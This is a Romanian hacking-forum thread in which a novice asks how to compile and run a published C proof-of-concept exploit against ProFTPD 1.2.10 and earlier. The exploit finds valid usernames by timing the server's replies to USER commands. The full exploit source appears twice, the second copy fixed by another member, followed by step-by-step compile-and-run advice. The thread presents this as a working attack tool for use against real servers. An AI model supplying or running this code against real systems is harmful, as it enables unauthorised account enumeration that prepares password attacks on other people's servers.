ProFTPD 1 2 10 Help

Hacking and more...
HaCkinG CulT

Lista Forumurilor Pe Tematici

Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.

Nou pe simpatie:
micky_miha

Femeie
23 ani
Bucuresti
cauta Barbat
23 - 43 ani

Hacking and more... / Exploituri si POCs / ProFTPD 1.2.10 Help

Moderat de Shocker

Autor

Mesaj

Pagini: 1

BlackLord
Junior

Inregistrat: acum 17 ani
Postari: 22

As vrea sa stiu si io cum as putea face exploitul asta sa mearga ?

observ k e in c si nust cum sa il compilez .... si daca il compilez cum il fac sa mearga ..plz cine poate explik !!!

/*
Details
Vulnerable Systems:
* ProFTPD Version 1.2.10 and below

It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There is a very small (but significant) difference in time delay of code execution path between valid and non-valid user names. That can be used to remotely determine the difference between existent and non-existent users. The time delay can be measured by using a simple FTP client that will calculate elapsed time between 'USER' command sent by client, and the server response. Because of the very short response period, elapsed time should be measured in microseconds.

Proof of Concept Code:
LSS has developed simple PoC exploit that is presented here:

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic //
*/

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
int sock,n,y;
long dist,stat=0;
struct sockaddr_in sin;
char buf[1024], buf2[1024];
struct timeval tv, tv2;
struct timezone tz, tz2;

printf ("Proftpd remote users discovery exploitn"
" Coded by Leon / LSS Securityn"
">-------------------------------------<n"

;

if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }

sock = socket (AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons (PORT);
sin.sin_addr.s_addr = inet_addr (argv[1]);
bzero (sin.sin_zero,8);

connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

printf ("Login time: "

;
n = read (sock,buf2, sizeof(buf2));
for (y=0;y<PROBE;y++) {
gettimeofday (&tv,&tz);
snprintf (buf, sizeof(buf)-1,"USER %srn",argv[2]);
write (sock, buf, strlen(buf));
n = read (sock,buf2, sizeof(buf2));
gettimeofday (&tv2,&tz2);
dist =tv2.tv_usec - tv.tv_usec;
stat += dist;
printf (" %d |",dist);
}
printf ("nAvrg: %dn",(stat/PROBE));
close (sock);
}

pus acum 17 ani

DarkTempo
Elite Member

Inregistrat: acum 17 ani
Postari: 556

altu cu mai multe greseli nu ai gasit ?

aniway ... l-am "corectat"
il compilezi in cygwin

Code:

/* 
Details 
Vulnerable Systems:
* ProFTPD Version 1.2.10 and below

It is possible to determine which user names are valid, 
which are special, and which ones do not exist on the remote system.
 This can be accomplished by code execution path timing analysis attack 
at the ProFTPd login procedure. There is a very small (but significant) 
difference in time delay of code execution path between valid and non-valid user names. 
That can be used to remotely determine the difference between existent and non-existent 
users. 
The time delay can be measured by using a simple FTP client that will 
calculate elapsed time between 'USER' command sent by client, and the 
server response. Because of the very short response period, elapsed time 
should be measured in microseconds.

Proof of Concept Code:
LSS has developed simple PoC exploit that is presented here:

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic // http://www.lss.hr
*/
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
int sock,n,y;
long dist,stat=0;
struct sockaddr_in sin;
char buf[1024], buf2[1024];
struct timeval tv, tv2;
struct timezone tz, tz2;

printf ("Proftpd remote users discovery exploitn"
" Coded by Leon / LSS Securityn"
">-------------------------------------<n");

if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }

sock = socket (AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons (PORT);
sin.sin_addr.s_addr = inet_addr (argv[1]);
bzero (sin.sin_zero,8);

connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

printf ("Login time: ");
n = read (sock,buf2, sizeof(buf2));
for (y=0;y<PROBE;y++) {
gettimeofday (&tv,&tz);
snprintf (buf, sizeof(buf)-1,"USER %srn",argv[2]);
write (sock, buf, strlen(buf));
n = read (sock,buf2, sizeof(buf2));
gettimeofday (&tv2,&tz2);
dist =tv2.tv_usec - tv.tv_usec;
stat += dist;
printf (" %d |",dist);
}
printf ("nAvrg: %dn",(stat/PROBE));
close(sock);
}

Modificat de DarkTempo (acum 17 ani)

_______________________________________
admin edit: poza mai mare de 300 x 100 pixeli

pus acum 17 ani

BlackLord
Junior

Inregistrat: acum 17 ani
Postari: 22

dupa ce il compilez cum il deschid ? sunt km bata la astea facute in c .... stiu decat in perl

pus acum 17 ani

OSHO
Elite Member

Din: Cluj
Inregistrat: acum 17 ani
Postari: 2069

Ar fi bine sa inveti programare inainte sa aplici exploituri. Pune-te pe invatat ca sa scapi de intrebarile astea penibile.

Daca il compilezi cu cc sau gcc o sa gasesti la sfarsitul compilarii un fisier a.out. Ala trebuie rulat cu ./a.out. Normal ar trebui sa-l faca cu drept de executie. Daca nu are drept de executie ii dai chmod 755 a.out.

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

pus acum 17 ani

BlackLord
Junior

Inregistrat: acum 17 ani
Postari: 22

mdea...ai dreptate ... ms pt raspuns :P

pus acum 17 ani

Pagini: 1

Mergi la